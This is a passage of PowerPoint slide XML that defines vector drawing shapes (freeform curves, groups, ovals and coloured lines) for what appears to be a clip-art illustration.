                          <a:pt x="236" y="135"/>
                          <a:pt x="236" y="124"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="235" y="114"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="192" y="75"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="195" y="97"/>
                          <a:pt x="197" y="108"/>
                          <a:pt x="200" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="198" y="123"/>
                          <a:pt x="197" y="124"/>
                          <a:pt x="196" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="111"/>
                          <a:pt x="195" y="99"/>
                          <a:pt x="194" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="192" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="75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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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672" name="Group 217">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519B783D-712F-4239-A917-B9AD2EB5222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923" y="2586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1676" name="Freeform 218">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE65F089-033E-4E00-B51D-B91BD221107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77" name="Freeform 219">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD563D1F-4305-4F1A-BB35-48E201005C2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78" name="Freeform 220">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4AE7870-6B33-4173-ADE5-1D5D0F7E3A0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673" name="Freeform 221">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FAFB2AB-05F4-46B2-8B2B-9243218945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084" y="2511"/>
                    <a:ext cx="87" cy="55"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 29 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 15 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 53 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 29 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="29" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="15" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="53" y="0"/>
                          <a:pt x="53" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="53" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="29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74" name="Freeform 222">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F7FAF3-4A32-41A7-8839-D458136182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093" y="2690"/>
                    <a:ext cx="121" cy="72"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 75 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 54"/>
                      <a:gd name="T2" fmla="*/ 27 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 54"/>
                      <a:gd name="T4" fmla="*/ 40 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 54"/>
                      <a:gd name="T6" fmla="*/ 91 w 91"/>
                      <a:gd name="T7" fmla="*/ 32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1" h="54">
                        <a:moveTo>
                          <a:pt x="75" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="4"/>
                          <a:pt x="45" y="9"/>
                          <a:pt x="27" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="22"/>
                          <a:pt x="17" y="54"/>
                          <a:pt x="40" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="44"/>
                          <a:pt x="65" y="38"/>
                          <a:pt x="91" y="32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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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75" name="Oval 223">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A3F97F-4D41-4A43-9780-FC8FF16629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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2074" y="2441"/>
                    <a:ext cx="105" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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662" name="Group 224">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A740E9B2-4047-4B77-8183-8B4534E3EA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768" y="2909"/>
                  <a:ext cx="257" cy="202"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1667" name="Freeform 225">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E675BD1-BBEB-42EE-989B-865B578D9E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68" name="Freeform 226">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D0BC9A-B411-4E4B-863E-B94AE70F64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69" name="Freeform 227">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCA1FD7-E060-4E6B-9FD4-0C7B486D4D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315" y="1589"/>
                    <a:ext cx="297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663" name="Group 228">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D678C4FF-FD39-4EDA-A73A-2DDF489F202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76" y="2748"/>
                  <a:ext cx="257" cy="202"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1664" name="Freeform 229">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4490BF05-7637-4F4F-89F8-6721A05BDE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65" name="Freeform 230">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366073A7-45AA-465E-A530-ACEE4A9337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66" name="Freeform 231">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660E45AB-871B-4104-B7A2-5524815AAF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315" y="1589"/>
                    <a:ext cx="297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1618" name="Group 499">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE75F7D-55D4-4347-8A1C-E681A4CEB1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65652" y="2155485"/>
              <a:ext cx="355599" cy="187325"/>
              <a:chOff x="5063" y="-2464"/>
              <a:chExt cx="1810" cy="954"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1650" name="Freeform 500">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C94B476-C165-4FB1-B092-6911BE71495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63" y="-2464"/>
                <a:ext cx="1810" cy="486"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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51" name="Freeform 501">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78998F5C-FA10-4AEB-972E-CBEED17FDFD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63" y="-2344"/>
                <a:ext cx="1358" cy="834"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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52" name="Freeform 502">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF47C0D-9EAB-4E20-B5F3-A6A5837173F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421" y="-2101"/>
                <a:ext cx="452" cy="591"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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53" name="Freeform 503">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D60F374-ABF2-409C-821B-48885BAE4F9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17" y="-2249"/>
                <a:ext cx="322" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 322"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 322"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 322 w 322"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 322 w 322"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 322"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="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54" name="Freeform 504">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173ADF63-055F-408F-808E-2FB5E6CA0DB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78" y="-2122"/>
                <a:ext cx="319" cy="416"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 416"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 331 h 416"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 416 h 416"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 416"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="416">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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55" name="Freeform 505">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46873423-2424-469F-9930-3E9A1442004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036" y="-1994"/>
                <a:ext cx="319" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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619" name="Line 506">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D54312-CEA2-49A2-9CCF-E67067E20697}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipH="1">
              <a:off x="7505254" y="2263434"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill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20" name="Line 507">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4867760C-5C81-4D38-A07D-8D452148AA78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipH="1">
              <a:off x="7600504" y="2288834"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill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21" name="Line 476">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D128256-B3A8-44CB-8459-E91C5AE2DD6F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089159" y="2196428"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill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22" name="Line 477">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D8D2D17-184A-456E-8677-87CA151CEDBF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5993909" y="2221828"/>
              <a:ext cx="792162" cy="215900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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23" name="Group 478">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E8BCB4-04DF-4D86-91AF-D055B85428B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689234" y="2299628"/>
              <a:ext cx="355600" cy="187326"/>
              <a:chOff x="2880" y="1638"/>
              <a:chExt cx="224" cy="118"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1647" name="Freeform 479">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43134EDA-A4A7-48DA-83D9-4283BA197F1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80" y="1638"/>
                <a:ext cx="224" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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48" name="Freeform 480">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8F8F4C-2000-46C9-88A5-3895A7C643A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80" y="1653"/>
                <a:ext cx="168" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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49" name="Freeform 481">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D914D2C-7C23-4245-9C6D-7507F40801D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48" y="1683"/>
                <a:ext cx="56" cy="73"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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624" name="Group 484">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51C03D9-C0B1-42CD-8F59-A7AC2B03F7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1888" y="2608871"/>
              <a:ext cx="355599" cy="187325"/>
              <a:chOff x="5063" y="-2464"/>
              <a:chExt cx="1810" cy="954"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1641" name="Freeform 485">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17D98F8-A37C-4D82-A262-BFEF277A7DC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63" y="-2464"/>
                <a:ext cx="1810" cy="486"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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42" name="Freeform 486">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0721930-C46E-40A3-9135-454BF9C47D1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63" y="-2344"/>
                <a:ext cx="1358" cy="834"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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43" name="Freeform 487">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADA0333-63FE-4AB1-826A-F61E575E0E6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421" y="-2101"/>
                <a:ext cx="452" cy="591"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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44" name="Freeform 488">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
